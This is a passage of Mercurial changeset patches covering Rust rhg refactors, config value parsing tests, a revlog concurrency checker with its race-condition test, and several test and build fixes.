exitcode::OK, + Err(CommandError::Abort { .. 
}) => exitcode::ABORT, // Exit with a specific code and no error message to let a potential // wrapper script fallback to Python-based Mercurial. Err(CommandError::Unimplemented) => exitcode::UNIMPLEMENTED, - - Err(CommandError::Abort { message }) => { - if !message.is_empty() { - // Ignore errors when writing to stderr, we’re already exiting - // with failure code so there’s not much more we can do. - let _ = - ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); - } - exitcode::ABORT - } - }; - std::process::exit(exit_code) + } } macro_rules! subcommands { diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -261,3 +261,15 @@ $ rhg cat -r 0 a a +The blackbox extension is supported + + $ echo "[extensions]" >> $HGRCPATH + $ echo "blackbox =" >> $HGRCPATH + $ echo "[blackbox]" >> $HGRCPATH + $ echo "maxsize = 1" >> $HGRCPATH + $ rhg files > /dev/null + $ cat .hg/blackbox.log + ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files exited 0 after 0.??? seconds (glob) + $ cat .hg/blackbox.log.1 + ????/??/?? ??:??:??.??? 
* @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files (glob) + # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613589844 -3600 # Wed Feb 17 20:24:04 2021 +0100 # Node ID a687a7f27951a0955684b2eaa5177a3997d539b9 # Parent 755c31a1caf9ec7786fee84fa7c05205f5c4587f rust: Move config value parsing functions to a new module Differential Revision: https://phab.mercurial-scm.org/D10021 diff --git a/rust/hg-core/src/config.rs b/rust/hg-core/src/config.rs --- a/rust/hg-core/src/config.rs +++ b/rust/hg-core/src/config.rs @@ -11,5 +11,6 @@ mod config; mod layer; +mod values; pub use config::{Config, ConfigValueParseError}; pub use layer::{ConfigError, ConfigParseError}; diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -8,6 +8,7 @@ // GNU General Public License version 2 or any later version. use super::layer; +use super::values; use crate::config::layer::{ ConfigError, ConfigLayer, ConfigOrigin, ConfigValue, }; @@ -64,40 +65,6 @@ pub expected_type: &'static str, } -pub fn parse_bool(v: &[u8]) -> Option<bool> { - match v.to_ascii_lowercase().as_slice() { - b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), - b"0" | b"no" | b"false" | b"off" | b"never" => Some(false), - _ => None, - } -} - -pub fn parse_byte_size(value: &[u8]) -> Option<u64> { - let value = str::from_utf8(value).ok()?.to_ascii_lowercase(); - const UNITS: &[(&str, u64)] = &[ - ("g", 1 << 30), - ("gb", 1 << 30), - ("m", 1 << 20), - ("mb", 1 << 20), - ("k", 1 << 10), - ("kb", 1 << 10), - ("b", 1 << 0), // Needs to be last - ]; - for &(unit, multiplier) in UNITS { - // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+ - if value.ends_with(unit) { - let value_before_unit = &value[..value.len() - unit.len()]; - let float: f64 = value_before_unit.trim().parse().ok()?; - if float >= 0.0 { - return Some((float * multiplier as f64).round() as u64); - } 
else { - return None; - } - } - } - value.parse().ok() -} - impl Config { /// Load system and user configuration from various files. /// @@ -324,7 +291,7 @@ section: &[u8], item: &[u8], ) -> Result<Option<u64>, ConfigValueParseError> { - self.get_parse(section, item, "byte quantity", parse_byte_size) + self.get_parse(section, item, "byte quantity", values::parse_byte_size) } /// Returns an `Err` if the first value found is not a valid boolean. @@ -335,7 +302,7 @@ section: &[u8], item: &[u8], ) -> Result<Option<bool>, ConfigValueParseError> { - self.get_parse(section, item, "boolean", parse_bool) + self.get_parse(section, item, "boolean", values::parse_bool) } /// Returns the corresponding boolean in the config. Returns `Ok(false)` diff --git a/rust/hg-core/src/config/values.rs b/rust/hg-core/src/config/values.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/config/values.rs @@ -0,0 +1,43 @@ +//! Parsing functions for various type of configuration values. +//! +//! Returning `None` indicates a syntax error. Using a `Result` would be more +//! correct but would take more boilerplate for converting between error types, +//! compared to using `.ok()` on inner results of various error types to +//! convert them all to options. The `Config::get_parse` method later converts +//! those options to results with `ConfigValueParseError`, which contains +//! details about where the value came from (but omits details of what’s +//! invalid inside the value). 
+ +pub(super) fn parse_bool(v: &[u8]) -> Option<bool> { + match v.to_ascii_lowercase().as_slice() { + b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), + b"0" | b"no" | b"false" | b"off" | b"never" => Some(false), + _ => None, + } +} + +pub(super) fn parse_byte_size(value: &[u8]) -> Option<u64> { + let value = std::str::from_utf8(value).ok()?.to_ascii_lowercase(); + const UNITS: &[(&str, u64)] = &[ + ("g", 1 << 30), + ("gb", 1 << 30), + ("m", 1 << 20), + ("mb", 1 << 20), + ("k", 1 << 10), + ("kb", 1 << 10), + ("b", 1 << 0), // Needs to be last + ]; + for &(unit, multiplier) in UNITS { + // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+ + if value.ends_with(unit) { + let value_before_unit = &value[..value.len() - unit.len()]; + let float: f64 = value_before_unit.trim().parse().ok()?; + if float >= 0.0 { + return Some((float * multiplier as f64).round() as u64); + } else { + return None; + } + } + } + value.parse().ok() +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613590819 -3600 # Wed Feb 17 20:40:19 2021 +0100 # Node ID 1b7c0b10d93015d99bffd884015be2a4d61b5640 # Parent a687a7f27951a0955684b2eaa5177a3997d539b9 rust: Add some unit tests for parse_byte_size in config Differential Revision: https://phab.mercurial-scm.org/D10022 diff --git a/rust/hg-core/src/config/values.rs b/rust/hg-core/src/config/values.rs --- a/rust/hg-core/src/config/values.rs +++ b/rust/hg-core/src/config/values.rs @@ -41,3 +41,21 @@ } value.parse().ok() } + +#[test] +fn test_parse_byte_size() { + assert_eq!(parse_byte_size(b""), None); + assert_eq!(parse_byte_size(b"b"), None); + + assert_eq!(parse_byte_size(b"12"), Some(12)); + assert_eq!(parse_byte_size(b"12b"), Some(12)); + assert_eq!(parse_byte_size(b"12 b"), Some(12)); + assert_eq!(parse_byte_size(b"12.1 b"), Some(12)); + assert_eq!(parse_byte_size(b"1.1 K"), Some(1126)); + assert_eq!(parse_byte_size(b"1.1 kB"), Some(1126)); + + assert_eq!(parse_byte_size(b"-12 b"), None); + 
assert_eq!(parse_byte_size(b"-0.1 b"), None); + assert_eq!(parse_byte_size(b"0.1 b"), Some(0)); + assert_eq!(parse_byte_size(b"12.1 b"), Some(12)); +} # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1612477415 -3600 # Thu Feb 04 23:23:35 2021 +0100 # Node ID ad107ed7a4aa23fad1fb9da570ee0f872269fff2 # Parent 1b7c0b10d93015d99bffd884015be2a4d61b5640 ci: test real dependency installation for pip In the past, the pip smoke test inhibited actual dependency installation, but that fails in different environments for setuptools itself. Since it isn't what we actually want to test (which is pip install), allow this to call home, if HGTESTS_ALLOW_NETIO=1 is set in the environment. Differential Revision: https://phab.mercurial-scm.org/D9950 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -702,6 +702,12 @@ return os.path.isdir(os.path.join(t, "..", ".hg")) +@check("network-io", "whether tests are allowed to access 3rd party services") +def has_test_repo(): + t = os.environ.get("HGTESTS_ALLOW_NETIO") + return t == "1" + + @check("curses", "terminfo compiler and curses module") def has_curses(): try: diff --git a/tests/test-install.t b/tests/test-install.t --- a/tests/test-install.t +++ b/tests/test-install.t @@ -184,7 +184,7 @@ $ cd $TESTTMP $ unset PYTHONPATH -#if py3 ensurepip +#if py3 ensurepip network-io $ "$PYTHON" -m venv installenv >> pip.log Hack: Debian does something a bit different in ensurepip.bootstrap. This makes @@ -197,8 +197,10 @@ Note: we use this weird path to run pip and hg to avoid platform differences, since it's bin on most platforms but Scripts on Windows. - $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log + $ ./installenv/*/pip install $TESTDIR/.. >> pip.log Failed building wheel for mercurial (?) + WARNING: You are using pip version *; however, version * is available. (glob) (?) 
+ You should consider upgrading via the '$TESTTMP/installenv/bin/python* -m pip install --upgrade pip' command. (glob) (?) $ ./installenv/*/hg debuginstall || cat pip.log checking encoding (ascii)... checking Python executable (*) (glob) @@ -222,17 +224,17 @@ no problems detected #endif -#if virtualenv no-py3 +#if virtualenv no-py3 network-io Note: --no-site-packages is the default for all versions enabled by hghave - $ "$PYTHON" -m virtualenv --never-download installenv >> pip.log + $ "$PYTHON" -m virtualenv installenv >> pip.log DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?) DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?) Note: we use this weird path to run pip and hg to avoid platform differences, since it's bin on most platforms but Scripts on Windows. - $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log + $ ./installenv/*/pip install $TESTDIR/.. >> pip.log DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?) DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?) 
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality. (?) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614149726 28800 # Tue Feb 23 22:55:26 2021 -0800 # Node ID 946a07f0890630fc960395a90f5ff718d3aad01d # Parent ad107ed7a4aa23fad1fb9da570ee0f872269fff2 tests: demonstrate assertion error when modifying working copy while narrowing Differential Revision: https://phab.mercurial-scm.org/D10062 diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -509,3 +509,11 @@ deleting meta/d0/00manifest.i (tree !) deleting meta/d2/00manifest.i (tree !) $ ls .hg/strip-backup/ + + +Test removing include while concurrently modifying file in that path + $ hg clone --narrow ssh://user@dummy/master narrow-concurrent-modify -q \ + > --include d0 --include d1 + $ cd narrow-concurrent-modify + $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0 2>&1 | grep AssertionError + AssertionError # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614149910 28800 # Tue Feb 23 22:58:30 2021 -0800 # Node ID ced66295ea90fc0ba66da3c5d616e975289ae5eb # Parent 946a07f0890630fc960395a90f5ff718d3aad01d narrow: remove assertion about working copy being clean The user can always modify the working copy, including while they're running `hg tracked --remove-include <path>`. Nothing really bad happens when they do that, and we already have code for printing a nice warning, so we can safely remove the assertion we had. 
Differential Revision: https://phab.mercurial-scm.org/D10063 diff --git a/mercurial/narrowspec.py b/mercurial/narrowspec.py --- a/mercurial/narrowspec.py +++ b/mercurial/narrowspec.py @@ -329,7 +329,6 @@ trackeddirty = status.modified + status.added clean = status.clean if assumeclean: - assert not trackeddirty clean.extend(lookup) else: trackeddirty.extend(lookup) diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -515,5 +515,10 @@ $ hg clone --narrow ssh://user@dummy/master narrow-concurrent-modify -q \ > --include d0 --include d1 $ cd narrow-concurrent-modify - $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0 2>&1 | grep AssertionError - AssertionError + $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0 + comparing with ssh://user@dummy/master + searching for changes + looking for local changes to affected paths + deleting data/d0/f.i + deleting meta/d0/00manifest.i (tree !) + not deleting possibly dirty file d0/f # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1612398790 28800 # Wed Feb 03 16:33:10 2021 -0800 # Node ID e9901d01d135647cf7bf518aa30a03a4088b067b # Parent ced66295ea90fc0ba66da3c5d616e975289ae5eb revlog: add a mechanism to verify expected file position before appending If someone uses `hg debuglocks`, or some non-hg process writes to the .hg directory without respecting the locks, or if the repo's on a networked filesystem, it's possible for the revlog code to write out corrupted data. The form of this corruption can vary depending on what data was written and how that happened. We are in the "networked filesystem" case (though I've had users also do this to themselves with the "`hg debuglocks`" scenario), and most often see this with the changelog. 
What ends up happening is we produce two items (let's call them rev1 and rev2) in the .i file that have the same linkrev, baserev, and offset into the .d file, while the data in the .d file is appended properly. rev2's compressed_size is accurate for rev2, but when we go to decompress the data in the .d file, we use the offset that's recorded in the index file, which is the same as rev1, and attempt to decompress rev2.compressed_size bytes of rev1's data. This usually does not succeed. :) When using inline data, this also fails, though I haven't investigated why too closely. This shows up as a "patch decode" error. I believe what's happening there is that we're basically ignoring the offset field, getting the data properly, but since baserev != rev, it thinks this is a delta based on rev (instead of a full text) and can't actually apply it as such. For now, I'm going to make this an optional component and default it to entirely off. I may increase the default severity of this in the future, once I've enabled it for my users and we gain more experience with it. Luckily, most of my users have a versioned filesystem and can roll back to before the corruption has been written, it's just a hassle to do so and not everyone knows how (so it's a support burden). Users on other filesystems will not have that luxury, and this can cause them to have a corrupted repository that they are unlikely to know how to resolve, and they'll see this as a data-loss event. Refusing to create the corruption is a much better user experience. This mechanism is not perfect. There may be false-negatives (racy writes that are not detected). There should not be any false-positives (non-racy writes that are detected as such). This is not a mechanism that makes putting a repo on a networked filesystem "safe" or "supported", just *less* likely to cause corruption. 
Differential Revision: https://phab.mercurial-scm.org/D9952 diff --git a/hgext/git/__init__.py b/hgext/git/__init__.py --- a/hgext/git/__init__.py +++ b/hgext/git/__init__.py @@ -90,7 +90,7 @@ return os.path.join(self.path, b'..', b'.hg', f) raise NotImplementedError(b'Need to pick file for %s.' % f) - def changelog(self, trypending): + def changelog(self, trypending, concurrencychecker): # TODO we don't have a plan for trypending in hg's git support yet return gitlog.changelog(self.git, self._db) diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -380,7 +380,7 @@ class changelog(revlog.revlog): - def __init__(self, opener, trypending=False): + def __init__(self, opener, trypending=False, concurrencychecker=None): """Load a changelog revlog using an opener. If ``trypending`` is true, we attempt to load the index from a @@ -389,6 +389,9 @@ revision) data for a transaction that hasn't been finalized yet. It exists in a separate file to facilitate readers (such as hooks processes) accessing data before a transaction is finalized. + + ``concurrencychecker`` will be passed to the revlog init function, see + the documentation there. 
""" if trypending and opener.exists(b'00changelog.i.a'): indexfile = b'00changelog.i.a' @@ -404,6 +407,7 @@ checkambig=True, mmaplargeindex=True, persistentnodemap=opener.options.get(b'persistent-nodemap', False), + concurrencychecker=concurrencychecker, ) if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1): diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -580,6 +580,11 @@ default=0, ) coreconfigitem( + b'debug', + b'revlog.verifyposition.changelog', + default=b'', +) +coreconfigitem( b'defaults', b'.*', default=None, diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -84,7 +84,10 @@ stringutil, ) -from .revlogutils import constants as revlogconst +from .revlogutils import ( + concurrency_checker as revlogchecker, + constants as revlogconst, +) release = lockmod.release urlerr = util.urlerr @@ -1639,7 +1642,10 @@ def changelog(self): # load dirstate before changelog to avoid race see issue6303 self.dirstate.prefetch_parents() - return self.store.changelog(txnutil.mayhavepending(self.root)) + return self.store.changelog( + txnutil.mayhavepending(self.root), + concurrencychecker=revlogchecker.get_checker(self.ui, b'changelog'), + ) @storecache(b'00manifest.i') def manifestlog(self): diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -421,6 +421,11 @@ If `upperboundcomp` is not None, this is the expected maximal gain from compression for the data content. + + `concurrencychecker` is an optional function that receives 3 arguments: a + file handle, a filename, and an expected position. It should check whether + the current position in the file handle is valid, and log/warn/fail (by + raising). 
""" _flagserrorclass = error.RevlogError @@ -435,6 +440,7 @@ censorable=False, upperboundcomp=None, persistentnodemap=False, + concurrencychecker=None, ): """ create a revlog object @@ -490,6 +496,8 @@ self._loadindex() + self._concurrencychecker = concurrencychecker + def _loadindex(self): mmapindexthreshold = None opts = self.opener.options @@ -2284,6 +2292,21 @@ curr = len(self) prev = curr - 1 offset = self.end(prev) + + if self._concurrencychecker: + if self._inline: + # offset is "as if" it were in the .d file, so we need to add on + # the size of the entry metadata. + self._concurrencychecker( + ifh, self.indexfile, offset + curr * self._io.size + ) + else: + # Entries in the .i are a consistent size. + self._concurrencychecker( + ifh, self.indexfile, curr * self._io.size + ) + self._concurrencychecker(dfh, self.datafile, offset) + p1r, p2r = self.rev(p1), self.rev(p2) # full versions are inserted when the needed deltas diff --git a/mercurial/revlogutils/concurrency_checker.py b/mercurial/revlogutils/concurrency_checker.py new file mode 100644 --- /dev/null +++ b/mercurial/revlogutils/concurrency_checker.py @@ -0,0 +1,38 @@ +from ..i18n import _ +from .. import error + + +def get_checker(ui, revlog_name=b'changelog'): + """Get a function that checks file handle position is as expected. + + This is used to ensure that files haven't been modified outside of our + knowledge (such as on a networked filesystem, if `hg debuglocks` was used, + or writes to .hg that ignored locks happened). + + Due to revlogs supporting a concept of buffered, delayed, or diverted + writes, we're allowing the files to be shorter than expected (the data may + not have been written yet), but they can't be longer. + + Please note that this check is not perfect; it can't detect all cases (there + may be false-negatives/false-OKs), but it should never claim there's an + issue when there isn't (false-positives/false-failures). + """ + + vpos = ui.config(b'debug', b'revlog.verifyposition.' 
+ revlog_name) + # Avoid any `fh.tell` cost if this isn't enabled. + if not vpos or vpos not in [b'log', b'warn', b'fail']: + return None + + def _checker(fh, fn, expected): + if fh.tell() <= expected: + return + + msg = _(b'%s: file cursor at position %d, expected %d') + # Always log if we're going to warn or fail. + ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected) + if vpos == b'warn': + ui.warn((msg + b'\n') % (fn, fh.tell(), expected)) + elif vpos == b'fail': + raise error.RevlogError(msg % (fn, fh.tell(), expected)) + + return _checker diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -433,8 +433,12 @@ l.sort() return l - def changelog(self, trypending): - return changelog.changelog(self.vfs, trypending=trypending) + def changelog(self, trypending, concurrencychecker=None): + return changelog.changelog( + self.vfs, + trypending=trypending, + concurrencychecker=concurrencychecker, + ) def manifestlog(self, repo, storenarrowmatch): rootstore = manifest.manifestrevlog(self.vfs) diff --git a/tests/test-racy-mutations.t b/tests/test-racy-mutations.t new file mode 100644 --- /dev/null +++ b/tests/test-racy-mutations.t @@ -0,0 +1,102 @@ +#testcases skip-detection fail-if-detected + +Test situations that "should" only be reproducible: +- on networked filesystems, or +- user using `hg debuglocks` to eliminate the lock file, or +- something (that doesn't respect the lock file) writing to the .hg directory +while we're running + + $ hg init a + $ cd a + + $ cat > "$TESTTMP/waitlock_editor.sh" <<EOF + > [ -n "\${WAITLOCK_ANNOUNCE:-}" ] && touch "\${WAITLOCK_ANNOUNCE}" + > f="\${WAITLOCK_FILE}" + > start=\`date +%s\` + > timeout=5 + > while [ \\( ! -f \$f \\) -a \\( ! 
-L \$f \\) ]; do + > now=\`date +%s\` + > if [ "\`expr \$now - \$start\`" -gt \$timeout ]; then + > echo "timeout: \$f was not created in \$timeout seconds (it is now \$(date +%s))" + > exit 1 + > fi + > sleep 0.1 + > done + > if [ \$# -gt 1 ]; then + > cat "\$@" + > fi + > EOF + $ chmod +x "$TESTTMP/waitlock_editor.sh" + +Things behave differently if we don't already have a 00changelog.i file when +this all starts, so let's make one. + + $ echo r0 > r0 + $ hg commit -qAm 'r0' + +Start an hg commit that will take a while + $ EDITOR_STARTED="$(pwd)/.editor_started" + $ MISCHIEF_MANAGED="$(pwd)/.mischief_managed" + $ JOBS_FINISHED="$(pwd)/.jobs_finished" + +#if fail-if-detected + $ cat >> .hg/hgrc << EOF + > [debug] + > revlog.verifyposition.changelog = fail + > EOF +#endif + + $ echo foo > foo + $ (WAITLOCK_ANNOUNCE="${EDITOR_STARTED}" \ + > WAITLOCK_FILE="${MISCHIEF_MANAGED}" \ + > HGEDITOR="$TESTTMP/waitlock_editor.sh" \ + > hg commit -qAm 'r1 (foo)' --edit foo > .foo_commit_out 2>&1 ; touch "${JOBS_FINISHED}") & + +Wait for the "editor" to actually start + $ WAITLOCK_FILE="${EDITOR_STARTED}" "$TESTTMP/waitlock_editor.sh" + +Break the locks, and make another commit. + $ hg debuglocks -LW + $ echo bar > bar + $ hg commit -qAm 'r2 (bar)' bar + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 + +Awaken the editor from that first commit + $ touch "${MISCHIEF_MANAGED}" +And wait for it to finish + $ WAITLOCK_FILE="${JOBS_FINISHED}" "$TESTTMP/waitlock_editor.sh" + +#if skip-detection +(Ensure there was no output) + $ cat .foo_commit_out +And observe a corrupted repository -- rev 2's linkrev is 1, which should never +happen for the changelog (the linkrev should always refer to itself). 
+ $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 + 2 1 ac80e6205bb2 222799e2f90b 000000000000 +#endif + +#if fail-if-detected + $ cat .foo_commit_out + transaction abort! + rollback completed + note: commit message saved in .hg/last-message.txt + note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it + abort: 00changelog.i: file cursor at position 249, expected 121 +And no corruption in the changelog. + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 +And, because of transactions, there's none in the manifestlog either. + $ hg debugrevlogindex -m + rev linkrev nodeid p1 p2 + 0 0 7b7020262a56 000000000000 000000000000 + 1 1 ad3fe36d86d9 7b7020262a56 000000000000 +#endif + # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614338203 -3600 # Fri Feb 26 12:16:43 2021 +0100 # Node ID 4e4c70401028bb73b9cce8401c88b0fb4cbc40ae # Parent e9901d01d135647cf7bf518aa30a03a4088b067b rhg: Use clap’s support for global CLI arguments By default, clap only accepts app-level arguments (as opposed to sub-command level) to be specified before a sub-command: `rhg -R ./foo log`. Specifying them after would be rejected: `rhg log -R ./foo`. Previously we worked around that by registering global arguments both at the app level and on each sub-command, but that required looking for their value in two places. It turns out that Clap has built-in support for what we want to do, so let’s use it. Also, Clap "settings" turn out to be either global or not too. Let’s make `AllowInvalidUtf8` apply to sub-commands too. 
Differential Revision: https://phab.mercurial-scm.org/D10080 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -15,39 +15,38 @@ mod ui; use error::CommandError; -fn add_global_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { - app.arg( - Arg::with_name("repository") - .help("repository root directory") - .short("-R") - .long("--repository") - .value_name("REPO") - .takes_value(true), - ) - .arg( - Arg::with_name("config") - .help("set/override config option (use 'section.name=value')") - .long("--config") - .value_name("CONFIG") - .takes_value(true) - // Ok: `--config section.key1=val --config section.key2=val2` - .multiple(true) - // Not ok: `--config section.key1=val section.key2=val2` - .number_of_values(1), - ) -} - fn main_with_result( ui: &ui::Ui, process_start_time: &blackbox::ProcessStartTime, ) -> Result<(), CommandError> { env_logger::init(); let app = App::new("rhg") - .setting(AppSettings::AllowInvalidUtf8) + .global_setting(AppSettings::AllowInvalidUtf8) .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) + .arg( + Arg::with_name("repository") + .help("repository root directory") + .short("-R") + .long("--repository") + .value_name("REPO") + .takes_value(true) + // Both ok: `hg -R ./foo log` or `hg log -R ./foo` + .global(true), + ) + .arg( + Arg::with_name("config") + .help("set/override config option (use 'section.name=value')") + .long("--config") + .value_name("CONFIG") + .takes_value(true) + .global(true) + // Ok: `--config section.key1=val --config section.key2=val2` + .multiple(true) + // Not ok: `--config section.key1=val section.key2=val2` + .number_of_values(1), + ) .version("0.0.1"); - let app = add_global_args(app); let app = add_subcommand_args(app); let matches = app.clone().get_matches_safe()?; @@ -58,26 +57,15 @@ let subcommand_args = subcommand_matches .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); - 
// Global arguments can be in either based on e.g. `hg -R ./foo log` v.s. - // `hg log -R ./foo` - let value_of_global_arg = |name| { - subcommand_args - .value_of_os(name) - .or_else(|| matches.value_of_os(name)) - }; - // For arguments where multiple occurences are allowed, return a - // possibly-iterator of all values. - let values_of_global_arg = |name: &str| { - let a = matches.values_of_os(name).into_iter().flatten(); - let b = subcommand_args.values_of_os(name).into_iter().flatten(); - a.chain(b) - }; - - let config_args = values_of_global_arg("config") + let config_args = matches + .values_of_os("config") + // Turn `Option::None` into an empty iterator: + .into_iter() + .flatten() .map(hg::utils::files::get_bytes_from_os_str); let non_repo_config = &hg::config::Config::load(config_args)?; - let repo_path = value_of_global_arg("repository").map(Path::new); + let repo_path = matches.value_of_os("repository").map(Path::new); let repo = match Repo::find(non_repo_config, repo_path) { Ok(repo) => Ok(repo), Err(RepoError::NotFound { at }) if repo_path.is_none() => { @@ -141,7 +129,7 @@ fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { app $( - .subcommand(add_global_args(commands::$command::args())) + .subcommand(commands::$command::args()) )+ } # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1614188454 18000 # Wed Feb 24 12:40:54 2021 -0500 # Node ID 25b1610f8534f6c588367ded4318cb7d762fe32c # Parent 4e4c70401028bb73b9cce8401c88b0fb4cbc40ae fuzz: if the caller of our makefile sets CC and CXX, trust them This should fix the broken fuzzing build, because we've been explicitly using clang++ but are now being given a CXX=afl++, which does extra stuff. 
Differential Revision: https://phab.mercurial-scm.org/D10066 diff --git a/contrib/fuzz/Makefile b/contrib/fuzz/Makefile --- a/contrib/fuzz/Makefile +++ b/contrib/fuzz/Makefile @@ -1,5 +1,5 @@ -CC = clang -CXX = clang++ +CC ?= clang +CXX ?= clang++ # By default, use our own standalone_fuzz_target_runner. # This runner does no fuzzing, but simply executes the inputs # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614187653 28800 # Wed Feb 24 09:27:33 2021 -0800 # Node ID d7d64b8c8229e47073634ca8860c060ac5949a5e # Parent 25b1610f8534f6c588367ded4318cb7d762fe32c tests: correct a commit description in test-copies-chain-merge.t Differential Revision: https://phab.mercurial-scm.org/D10065 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -78,7 +78,7 @@ $ echo "original content for P" > p $ echo "original content for Q" > q $ echo "original content for R" > r - $ hg ci -Am 'i-0 initial commit: a b h' + $ hg ci -Am 'i-0 initial commit: a b h p q r' adding a adding b adding h @@ -96,7 +96,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r And having another branch with renames on the other side @@ -114,7 +114,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Have a branching with nothing on one side @@ -131,7 +131,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Create a branch that delete a file previous renamed @@ -148,7 +148,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Create a branch that delete a file previous renamed and recreate it @@ -170,7 +170,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Having another branch renaming a different file 
to the same filename as another @@ -191,7 +191,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg up -q null @@ -213,7 +213,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg up -q null @@ -235,7 +235,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg up -q null @@ -281,7 +281,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -331,7 +331,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Comparing with a merge re-adding the file afterward @@ -371,7 +371,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -419,7 +419,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: new copy information on both side with an actual merge happening @@ -462,7 +462,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: existing copy information overwritten on one branch @@ -518,7 +518,7 @@ | o i-1: a -move-> c, 